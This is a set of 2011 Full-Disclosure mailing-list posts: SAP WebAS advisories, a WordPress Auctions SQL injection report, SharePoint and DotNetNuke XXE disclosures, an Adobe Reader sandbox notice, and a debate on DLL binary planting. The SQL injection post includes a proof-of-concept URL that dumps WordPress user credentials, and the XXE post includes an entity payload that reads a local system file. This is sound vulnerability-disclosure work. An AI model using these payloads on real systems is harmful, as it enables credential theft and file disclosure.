[Full-disclosure] [Onapsis Security Advisory 2011-016] SAP WebAS Malicious SAP Shortcut Generation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory 2011-016: SAP WebAS Malicious SAP Shortcut Generation This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them. Risk Level: Medium 2. Advisory Information = - - Release Date: 2011-09-14 - - Last Revised: 2011-09-14 - - Security Advisory ID: ONAPSIS-2011-016 - - Onapsis SVS ID: ONAPSIS-00041 - - Researcher: Mariano Nuñez Di Croce 3. Vulnerability Information == - - Vendor: SAP - - Affected Components: * SAP Web Application Server 7.00 Patch Number 95 ( Check note 1556749 for detailed information on affected releases) - - Vulnerability Class: Abuse of designed functionality / Parameter Injection - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: No - - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-016 4. Affected Components Description = The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM). 5. Vulnerability Details === The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM). The SHORTCUT ICF service represents a dangerous functionality per-se, as it can be executed anonymously by malicious parties to perform client-side attacks to the organization's end-users. Furthermore, this service contains a parameter injection vulnerability, which provides attackers with further control over the generation of the SAP shortcuts. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 7. Report Timeline === * 2011-01-25: Onapsis provides vulnerability information to SAP. * 2011-01-25: SAP confirms reception of vulnerability submission. * 2011-04-12: SAP releases sapnote 1556749 fixing the vulnerability. * 2011-09-14: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance requirements, decrease financial fraud risks an reduce audit costs drastically. Some of our featured services include SAP Penetration
[Full-disclosure] [Onapsis Security Advisory 2011-014] SAP WebAS Remote Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ?Onapsis Security Advisory 2011-014: SAP WebAS Remote Denial of Service 1. Impact on Business = By exploiting this vulnerability, an unauthenticated attacker would be able to remotely disrupt the SAP Application Server. This would result in the total unavailability of the ERP functionality, preventing company users from performing the required business processes. Risk Level: High 2. Advisory Information === - - Release Date: 2011-09-14 - - Last Revised: 2011-09-14 - - Security Advisory ID: ONAPSIS-2011-014 - - Onapsis SVS ID: ONAPSIS-00039 - - Researcher: Mariano Nuñez Di Croce 3. Vulnerability Information == - - Vendor: SAP - - Affected Components: * SAP Web Application Server 7.00 Patch Number 95 ( Check note 1553930 for detailed information on affected releases) - - Vulnerability Class: Abuse of designed functionality - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: Yes - - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-014 4. Affected Components Description === The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM). 5. Vulnerability Details = It was detected that the ?cachetest? service suffers from an input validation vulnerability. This interface can be abused by a malicious attacker to put the system under continuous, high-load conditions leading to a denial of service condition. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution SAP has released SAP Note 1553930 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1553930 Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline * 2011-01-24: Onapsis provides vulnerability information to SAP. * 2011-01-25: SAP confirms reception of vulnerability submission. * 2011-06-14: SAP releases SAP Note 1553930 fixing the vulnerability. * 2011-09-14: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance requirements, decrease financial fraud risks an reduce audit costs drastically. Some of our featured services include SAP Penetration Testing, SAP Gateway RFC security, SAP Enterprise Portal security assessment, Security Support for SAP Implementations and Upgrades, SAP System Hardening and SAP Technical Security Audits. For further information about our solutions, please contact us at i...@onapsis.com and visit our website at www.onapsis.com. Copyright (c) 2011 Onapsis SRL. All rights reserved. This advisory may be distributed
[Full-disclosure] [Onapsis Security Advisory 2011-015] SAP WebAS webrfc Cross-Site Scripting
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory 2011-015: SAP WebAS webrfc Cross-Site Scripting This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business === By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them. Risk Level: Medium 2. Advisory Information = - - Release Date: 2011-09-14 - - Last Revised: 2011-09-14 - - Security Advisory ID: ONAPSIS-2011-015 - - Onapsis SVS ID: ONAPSIS-00040 - - Researcher: Mariano Nuñez Di Croce 3. Vulnerability Information == - - Vendor: SAP - - Affected Components: * SAP Web Application Server 7.00 Patch Number 95 ( Check note 1536640 for detailed information on affected releases) - - Vulnerability Class: Cross-Site Scripting (XSS) - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: Yes - - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-015 4. Affected Components Description === The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM). 5. Vulnerability Details == It has been detected that the WEBRFC ICF service suffers from an input validation vulnerability, which can be exploited to perform XSS attacks. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution = SAP has released SAP Note 1536640 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1536640 Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline * 2011-01-25: Onapsis provides vulnerability information to SAP. * 2011-01-25: SAP confirms reception of vulnerability submission. * 2011-05-10: SAP releases SAP Note 1536640 fixing the vulnerability. * 2011-09-14: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance requirements, decrease financial fraud risks an reduce audit costs drastically. Some of our featured services include SAP Penetration Testing, SAP Gateway
Re: [Full-disclosure] WordPress Auctions plugin = 1.8.8 SQL Injection
On Wed, Sep 14, 2011 at 08:12:33PM +0300, Henri Salo wrote: On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote: # Exploit Title: WordPress Auctions plugin = 1.8.8 SQL Injection Vulnerability # Date: 2011-09-09 # Author: sherl0ck_ sherl0ck_[at]alligatorteam[dot]org @AlligatorTeam # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip # Version: 1.8.8 (tested) --- PoC --- URL: http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-addwpa_action=editwpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users_wpnonce=e04f105b8e --- Vulnerable code --- ... elseif($_GET[wpa_action] == edit): $strSQL = SELECT * FROM .$table_name. WHERE id=.$_GET[wpa_id]; ... elseif($_GET[wpa_action] == relist): $strSQL = SELECT * FROM .$table_name. WHERE id=.$_GET[wpa_id]; ... $resultList = $wpdb-get_row($strSQL); ... Did you report this issue to the author of the plugin? Best regards, Henri Salo Module owner replied: Thanks for raising this with us. The report is right in pointing out that those parameters aren't sanitised (which we will address immediately). It's work pointing out though, that this is an administration module (protected by WordPress's user permissions); rather than one that can be access anonymously. Follow-up: http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622 Best regards, Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WordPress Auctions plugin = 1.8.8 SQL Injection Vulnerability
On Wed, Sep 14, 2011 at 04:06:26PM -0300, Heyder[AlligatorTeam] wrote: # Exploit Title: WordPress Auctions plugin = 1.8.8 SQL Injection Vulnerability # Date: 2011-09-09 # Author: sherl0ck_ sherl0ck_[at]alligatorteam[dot]org @AlligatorTeam # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip # Version: 1.8.8 (tested) --- PoC --- URL: http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-addwpa_action=editwpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users_wpnonce=e04f105b8e --- Vulnerable code --- ... elseif($_GET[wpa_action] == edit): $strSQL = SELECT * FROM .$table_name. WHERE id=.$_GET[wpa_id]; ... elseif($_GET[wpa_action] == relist): $strSQL = SELECT * FROM .$table_name. WHERE id=.$_GET[wpa_id]; ... $resultList = $wpdb-get_row($strSQL); ... Module owner replied: Thanks for raising this with us. The report is right in pointing out that those parameters aren't sanitised (which we will address immediately). It's work pointing out though, that this is an administration module (protected by WordPress's user permissions); rather than one that can be access anonymously. Follow-up: http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622 Best regards, Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke
Hello, Microsoft recently published MS11-074. This bulletin concerns mainly SharePoint (2007 and 2010) but CVE-2011-1892 applies too to Office Groove (client and server), Office Forms Server 2007 and Office Web Apps 2010. The vulnerability is a XML External Entity Reference one, as described in CWE-611 [1]. The vulnerable component is XML Web Part and the following image demonstrates the exploit on a SharePoint 2007 server [2]. DotNetNuke has quietly patched this summer a very similar vulnerability in its XML component (v6.0.0 is OK [3]). As described in Microsoft documentation [4], setting XmlReaderSettings::XmlResolver to NULL is enough to correct this bug. Simple PoC for SharePoint and DotNetNuke : -- XML - !DOCTYPE doc [ !ENTITY boom SYSTEM c:\\windows\\system32\\drivers\\etc\\hosts ] docboom;/doc - -- XSL -- xsl:stylesheet version=1.0 xmlns:xsl=http://www.w3.org/1999/XSL/Transform; xsl:template match=/ xsl:apply-templates/ xsl:value-of select=doc/ /xsl:template /xsl:stylesheet - More details, in French, on my blog : http://goo.gl/hptbj 1: http://cwe.mitre.org/data/definitions/611.html 2: http://www.agarri.fr/docs/shpt-xee.png 3: http://dnnxml.codeplex.com/releases/view/62862 4: http://msdn.microsoft.com/en-us/library/ms172415.aspx Regards, Nicolas Grégoire / Agarri ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
Hi Thor, Microsoft is maintaining a list of binary planting bugs they've fixed here: http://technet.microsoft.com/en-us/security/advisory/2269637 You will find our name in some of these advisories. Calling the above effort a Binary Planting Clean-up Mission was merely a benign poetic exercise, and this is *not* an official name of any internal mission at Microsoft to the best of my knowledge. You can learn something about our interaction with Microsoft here: http://blog.acrossecurity.com/2010/08/binary-planting-update-day-7.html Cheers, Mitja -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God) Sent: Thursday, September 15, 2011 10:59 PM To: secur...@acrossecurity.com; 'ChristianSciberras' Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com Subject: Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission I'm curious. Who is your contact at MSFT? Who is it that has told you they have a Binary Planting Clean-up Mission and where do they mention you as having anything to do with it? If you are going to claim MSFT's actions as substantive to your agenda, how about provide some details? t -Original Message- From: ACROS Security Lists [mailto:li...@acros.si] Sent: Thursday, September 15, 2011 1:41 PM To: 'Christian Sciberras' Cc: Thor (Hammer of God); full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com Subject: RE: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission Hey Chris, I bet Microsoft actually like stating they just fixed yet another severe bug. Zero-day fixing is big business, you knoweven if zero is past a few days. I don't think Microsoft gains much from being able to say they fixed yet another bug - maybe if it were a bug they found internally and fixed proactively, but not like this. And I'm sure they'd rather be doing something else than fixing: fixing a product costs a lot, and it generates no revenue. Cheers, Mitja ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
Hi Adam, I'm afraid you don't fully understand the issue. This is not about placing your own DLL on a local machine so that a chosen application will load it (i.e., user attacking an application on his own computer). It is about an application running on your computer silently grabbing a malicious DLL from attacker-controlled location - possibly on a remote share - and executing its code (i.e., attacker with zero privileges on user's computer executing code on that computer). I hope this helps a little. Cheers, Mitja -Original Message- From: iaretheb...@gmail.com [mailto:iaretheb...@gmail.com] On Behalf Of adam Sent: Thursday, September 15, 2011 11:26 PM To: Thor (Hammer of God) Cc: secur...@acrossecurity.com; Christian Sciberras; full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com Subject: Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission Plus: pretending that you're on the same page as Microsoft (from a security standpoint) to further your own argument is more damaging than it is beneficial. The entire binary planting concept was flawed from the very beginning. If you can drop a binary file on a user's machine - make it an executable and be done with it. There's nothing fancy or innovative about forcing applications to use specific DLLs - script kiddies have been doing it for over 10 years to inject custom code in multiplayer games. On Thu, Sep 15, 2011 at 3:59 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I'm curious. Who is your contact at MSFT? Who is it that has told you they have a Binary Planting Clean-up Mission and where do they mention you as having anything to do with it? If you are going to claim MSFT's actions as substantive to your agenda, how about provide some details? t -Original Message- From: ACROS Security Lists [mailto:li...@acros.si] Sent: Thursday, September 15, 2011 1:41 PM To: 'Christian Sciberras' Cc: Thor (Hammer of God); full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com Subject: RE: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission Hey Chris, I bet Microsoft actually like stating they just fixed yet another severe bug. Zero-day fixing is big business, you knoweven if zero is past a few days. I don't think Microsoft gains much from being able to say they fixed yet another bug - maybe if it were a bug they found internally and fixed proactively, but not like this. And I'm sure they'd rather be doing something else than fixing: fixing a product costs a lot, and it generates no revenue. Cheers, Mitja ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
I'm afraid you don't fully understand the issue. This is not about placing your own DLL on a local machine so that a chosen application will load it (i.e., user attacking an application on his own computer). I'm not sure you understood the point. That being, whether the user knowingly or unknowingly loads the malicious DLL - the application will be effected the same either way. To that point: it's been possible for over a decade (and perhaps even longer) so pretending that it's some brand new threat that needs to be dealt with immediately is foolish. possibly on a remote share - and executing its code (i.e., attacker with zero privileges on user's computer executing code on that computer). Zero privileges? So having write access to a share that the user accesses/loads files from - what do you call that? This is a social engineering attack - absolutely nothing more. On a related note: have you also contacted Linus about LD_PRELOAD? On Thu, Sep 15, 2011 at 5:05 PM, ACROS Security Lists li...@acros.siwrote: Hi Adam, I'm afraid you don't fully understand the issue. This is not about placing your own DLL on a local machine so that a chosen application will load it (i.e., user attacking an application on his own computer). It is about an application running on your computer silently grabbing a malicious DLL from attacker-controlled location - possibly on a remote share - and executing its code (i.e., attacker with zero privileges on user's computer executing code on that computer). I hope this helps a little. Cheers, Mitja -Original Message- From: iaretheb...@gmail.com [mailto:iaretheb...@gmail.com] On Behalf Of adam Sent: Thursday, September 15, 2011 11:26 PM To: Thor (Hammer of God) Cc: secur...@acrossecurity.com; Christian Sciberras; full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com Subject: Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission Plus: pretending that you're on the same page as Microsoft (from a security standpoint) to further your own argument is more damaging than it is beneficial. The entire binary planting concept was flawed from the very beginning. If you can drop a binary file on a user's machine - make it an executable and be done with it. There's nothing fancy or innovative about forcing applications to use specific DLLs - script kiddies have been doing it for over 10 years to inject custom code in multiplayer games. On Thu, Sep 15, 2011 at 3:59 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I'm curious. Who is your contact at MSFT? Who is it that has told you they have a Binary Planting Clean-up Mission and where do they mention you as having anything to do with it? If you are going to claim MSFT's actions as substantive to your agenda, how about provide some details? t -Original Message- From: ACROS Security Lists [mailto:li...@acros.si] Sent: Thursday, September 15, 2011 1:41 PM To: 'Christian Sciberras' Cc: Thor (Hammer of God); full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com Subject: RE: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission Hey Chris, I bet Microsoft actually like stating they just fixed yet another severe bug. Zero-day fixing is big business, you knoweven if zero is past a few days. I don't think Microsoft gains much from being able to say they fixed yet another bug - maybe if it were a bug they found internally and fixed proactively, but not like this. And I'm sure they'd rather be doing something else than fixing: fixing a product costs a lot, and it generates no revenue. Cheers, Mitja ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
Dear Mitja, In your blog http://blog.acrossecurity.com/2011/09/microsofts-binary-planting-clean-up.html you wrote: Change #1: No file:// Inside http://; Microsoft changed the behavior of Internet Explorer such that a web page (served via http://) can't display the content of a shared folder (served via file://) in a frame/iframe. This is good ... Change #2: No file:// From http://; Not allowing a web page loaded via http:// to open a file:// URL blocks this attack vector and this is good. ... When were those IE changes made: as part of MS11-057 maybe? I could not find any references to such a change. Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FortiGuard Advisory: Adobe Reader X Sandbox Bypass Vulnerability
Adobe Reader X Sandbox Bypass Vulnerability Sep 13, 2011 Summary: Fortinet's FortiGuard Labs has discovered a sandbox bypass vulnerability in Adobe Reader X. Impact: === Local Privilege Escalation. Risk: = Critical Affected Software: == For a list of product versions affected, please see the Adobe Security Bulletin reference below. Additional Information: === By successfully leveraging a sandbox bypass vulnerability in Adobe Reader X, a malicious code could escape out of the sandbox resulting in privilege escalation. References: FortiGuard Advisory: http://www.fortiguard.com/advisory/FGA-2011-30.html Adobe Security Bulletin Summary for September 13, 2011:http://www.adobe.com/support/security/bulletins/apsb11-24.html CVE ID: CVE-2011-1353 Solutions: === Users should apply the solution provided by Adobe. Acknowledgment: == Zhenhua Liu of Fortinet's FortiGuard Labs *** Please note that this message and any attachments may contain confidential and proprietary material and information and are intended only for the use of the intended recipient(s). If you are not the intended recipient, you are hereby notified that any review, use, disclosure, dissemination, distribution or copying of this message and any attachments is strictly prohibited. If you have received this email in error, please immediately notify the sender and destroy this e-mail and any attachments and all copies, whether electronic or printed. Please also note that any views, opinions, conclusions or commitments expressed in this message are those of the individual sender and do not necessarily reflect the views of Fortinet, Inc., its affiliates, and emails are not binding on Fortinet and only a writing manually signed by Fortinet's General Counsel can be a binding commitment of Fortinet to Fortinet's customers or partners. Thank you. *** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
I really don't want to talk more about this because everyone seems to be hating on this. However... ld_preload has to be set locally by the user or somehow remotely pass and set ld_preload environment variable. Not only that, but it has to be in the trusted path. This search path problem would be consistent with the default search path of linux, which would be (according to man ld.so/ld-linux.so and man 3 dlopen's search path): o (ELF only) If the executable file for the calling program contains a DT_RPATH tag, and does not contain a DT_RUNPATH tag, then the directories listed in the DT_RPATH tag are searched. o If the environment variable * LD_LIBRARY_PATH* is defined to contain a colon-separated list of directories, then these are searched. (As a security measure this variable is ignored for set-user-ID and set-group-ID programs.) o (ELF only) If the executable file for the calling program contains a DT_RUNPATH tag, then the directories listed in that tag are searched. o The cache file * /etc/ld.so.cache* (maintained by *ldconfighttp://linux.die.net/man/8/ldconfig (8)*) is checked to see whether it contains an entry for *filename*. o The directories */lib* and */usr/lib* are searched (in that order). Now, the issue with Microsoft is that by simply using loadlibrary* (or by using anything that follows the default search path like CreateProcess*http://msdn.microsoft.com/en-us/library/ms682425%28VS.85%29.aspx, ShellExecute*http://msdn.microsoft.com/en-us/library/bb762153%28VS.85%29.aspx, WinExec http://msdn.microsoft.com/en-us/library/ms687393%28VS.85%29.aspx, LoadModulehttp://msdn.microsoft.com/en-us/library/ms684183%28VS.85%29.aspx, _spawn*p*http://msdn.microsoft.com/en-us/library/20y988d2%28v=VS.80%29.aspxand _exec*p* http://msdn.microsoft.com/en-us/library/431x4c1w%28VS.80%29.aspx)in your code and not specifying a full path, the search path can hit a remote directory to pull and execute the file. http://msdn.microsoft.com/en-us/library/ms682586%28v=vs.85%29.aspx Safe DLL search mode is enabled by default. If *SafeDllSearchMode* is enabled, the search order is as follows: 1. The directory from which the application loaded. 2. The system directory. Use the *GetSystemDirectory*http://msdn.microsoft.com/en-us/library/ms724373%28v=vs.85%29.aspxfunction to get the path of this directory. 3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. 4. The Windows directory. Use the *GetWindowsDirectory*http://msdn.microsoft.com/en-us/library/ms724454%28v=vs.85%29.aspxfunction to get the path of this directory. 5. The current directory. 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the *App Paths* registry key. The *App Paths* key is not used when computing the DLL search path. Of course, different functions have different search paths. Take a look at some more interesting example issues: *CreateProcess*, WinExec and LoadModule search paths* 1. The directory from which the application loaded 2. Current working directory 3. etc. In Windows's case, no one needs to do anything extra like set a problem environment variable or developer make some stupid mistake. Instead, it's just default behaviour when you load a library without specifying the full path. Again, with Linux, the default search path is going to be local unless otherwise specified compile-time with something like run_path and its $origin expansion. But even then you're restricted to trusted search path which is all local full path locations. As far as I know, you can't change a default search path to a remote location. But I haven't researched into it that much and this is a field of doing things in ways it shouldn't. The interesting part about this type of attack is that the attacker can run a webdav server to run the exploit. This is a normal looking url, not some incredibly obvious UNC path to an SMB share. Yes, like most client-side attacks, it may require some social engineering, hijacking of a domain, and etc. However, there's more to it than just downloading some random file from a stranger, it can be used in a decent combination by a well-designed attack. A good example is one that ACROS actually reported on (haven't verified myself, so going on their word). Check it out: The current Oracle's Java Runtime Environmenthttp://www.java.com/en/download/(version 6, update 26) - just like its previous versions - supports so-called Hotspot configuration fileshttp://blogs.oracle.com/javawithjiva/entry/hotspotrc_and_hotspot_compiler .hotspotrc and .hotspot_compiler. These files are loaded when Java virtual machine is initialized and can specify (or override) the VM settings that are usually provided as command-line parameters for java.exe or exclude chosen methods from compilation, respectively. They then go on to explain: